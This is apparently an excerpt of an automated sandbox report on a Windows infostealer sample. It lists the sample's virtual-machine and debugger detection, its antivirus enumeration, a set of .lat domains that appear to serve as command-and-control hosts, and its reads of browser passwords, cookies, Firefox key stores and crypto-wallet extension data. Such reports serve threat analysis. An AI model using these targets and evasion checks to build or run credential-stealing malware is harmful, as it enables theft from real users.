Source: Amcache.hve.5.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696497155s
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Amcache.hve.5.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: OtHVIQ2ge4.exe, 00000000.00000002.1921745248.0000000000754000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696497155j
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696497155o
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: Amcache.hve.5.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696497155
Source: Amcache.hve.5.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: Amcache.hve.5.dr | Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.5.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: OtHVIQ2ge4.exe, 00000000.00000002.1921745248.0000000000754000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: NTICE
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: SICE
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: bashfulacid.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: tentabatte.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: curverpluch.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: talkynicer.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: shapestickyr.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: manyrestro.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: slipperyloo.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: wordyfindy.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: observerfry.lat
Source: OtHVIQ2ge4.exe, 00000000.00000002.1922193530.000000000079B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wProgram Manager
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: OtHVIQ2ge4.exe, 00000000.00000003.1519321399.0000000005E1E000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572011566.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1519609736.0000000005E1E000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1532941911.0000000005E1E000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1532550139.0000000005E1E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: OtHVIQ2ge4.exe PID: 7832, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: OtHVIQ2ge4.exe | String found in binary or memory: Wallets/Electrum-LTC
Source: OtHVIQ2ge4.exe | String found in binary or memory: Wallets/ElectronCash
Source: OtHVIQ2ge4.exe | String found in binary or memory: Wallets/JAXX New Version
Source: OtHVIQ2ge4.exe | String found in binary or memory: window-state.json
Source: OtHVIQ2ge4.exe | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: OtHVIQ2ge4.exe | String found in binary or memory: ExodusWeb3
Source: OtHVIQ2ge4.exe | String found in binary or memory: Wallets/Ethereum
Source: OtHVIQ2ge4.exe, 00000000.00000003.1490591848.0000000001752000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: OtHVIQ2ge4.exe, 00000000.00000003.1572011566.00000000016CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
